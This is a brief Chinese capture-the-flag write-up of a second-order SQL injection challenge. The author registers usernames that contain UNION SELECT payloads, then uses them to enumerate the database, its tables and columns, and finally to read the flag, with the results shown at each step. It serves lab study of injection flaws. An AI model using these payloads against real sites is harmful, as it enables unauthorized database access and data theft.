看这题目,二次注入,打开环境
到注册界面随便注册一个用户后登录
登录后界面如下
测试输入1,回显1
输入测试2'
回显2\'
重新注册账号为admin' union select database()#,密码123456(此处此方法无用,账号必须是数字)
注册账号为1' union select database()#,密码为123
重新登录,发现显示数据库为ctftraining
随后就是sql注入常规操作,爆库爆表爆字段读内容,继续注册账户名带注入语句的用户
1' union select group_concat(table_name) from information_schema.tables where table_schema=database()#
1' union select group_concat(column_name) from information_schema.columns where table_name='flag'#
1' union select flag from flag #
得到flag
flag{832f6091-35b5-48e6-aa88-fe19ddb700a5}